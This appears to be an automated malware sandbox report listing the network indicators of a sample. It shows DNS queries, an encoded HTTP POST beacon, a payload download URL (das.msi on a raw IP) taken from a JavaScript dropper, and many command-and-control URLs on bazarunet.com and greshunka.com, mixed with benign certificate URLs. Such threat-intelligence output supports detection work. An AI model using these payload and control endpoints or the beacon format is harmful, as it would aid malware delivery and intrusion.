Source: global traffic DNS traffic detected: DNS query: greshunka.com
Source: global traffic DNS traffic detected: DNS query: tiguanin.com
Source: global traffic DNS traffic detected: DNS query: isomicrotich.com
Source: unknown HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFh9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 92Cache-Control: no-cache
Source: wscript.exe, 00000000.00000002.2065296412.00000196D5AD6000.00000004.00000020.00020000.00000000.sdmp, Document-18-33-08.js String found in binary or memory: http://188.119.112.7/das.msi
Source: ~DFED22D1FE613BF34C.TMP.1.dr, ~DF07B80D9F27CBE04D.TMP.1.dr, ~DF01B5DC13092BA872.TMP.1.dr, ~DF28B4DE99F83A16D6.TMP.1.dr, ~DF59A0B4535E503852.TMP.1.dr, inprogressinstallinfo.ipi.1.dr String found in binary or memory: http://188.119.112.7/das.msi0
Source: ~DF93ACB531B807E54B.TMP.1.dr String found in binary or memory: http://188.119.112.7/das.msi1737443152311351380
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: explorer.exe, 00000008.00000002.3331052313.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2446927908.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r10.i.lencr.org/0
Source: rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r10.o.lencr.org0#
Source: explorer.exe, 00000008.00000000.2452162910.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3344619758.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2451505146.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://t2.symcb.com0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://tl.symcd.com0&
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3333625550.000001FF4CF10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536162683.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536131672.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2444803935.000001FF4CA4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3333625550.000001FF4CF10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536162683.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536131672.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2444803935.000001FF4CA4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 00000008.00000000.2456761349.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3351439546.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000008.00000000.2449894954.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3335475832.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000008.00000000.2452717662.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000008.00000000.2449894954.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3335475832.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000008.00000002.3333615520.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2448316593.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com/
Source: rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/
Source: rundll32.exe, 00000006.00000003.3012131667.000001FF4CA78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/$E
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/&
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/U
Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036648885.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.php
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.php.
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.php3#
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036648885.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.php9#
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.phpF
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.phpO#
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/azar.php
Source: rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.php
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.php8
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.phpi
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.phpll
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.phpll.mui
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.php~
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/f
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/in.com:8041/admin.php
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/net.com:8041/admin.phpf
Source: rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/net.com:8041/bazar.php
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/zar.php
Source: explorer.exe, 00000008.00000000.2452717662.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com/
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com/g;
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/I
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.php
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.php-7
